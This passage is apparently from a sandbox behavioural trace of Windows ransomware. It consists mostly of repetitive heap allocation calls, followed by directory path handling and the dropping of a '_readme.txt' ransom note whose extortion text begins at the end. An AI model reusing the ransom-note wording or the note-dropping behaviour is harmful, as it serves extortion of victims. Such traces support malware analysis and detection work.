out: lpMsg=0x39cfb74) returned 0 [0200.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0200.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0200.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.779] PathFindFileNameW (pszPath="C:\\Boot\\es-ES\\") returned="es-ES\\" [0200.779] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0200.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.779] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0200.779] PathFindFileNameW (pszPath="") returned="" [0200.779] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0200.780] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0200.780] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0200.780] FreeLibrary (hLibModule=0x75020000) returned 1 [0200.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.780] PathAppendW (in: pszPath="C:\\Boot\\es-ES\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 1 [0200.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b158f8 [0200.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.780] PathFileExistsW (pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 0 [0200.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3b67060 [0200.784] lstrcpyW (in: lpString1=0x3b67060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 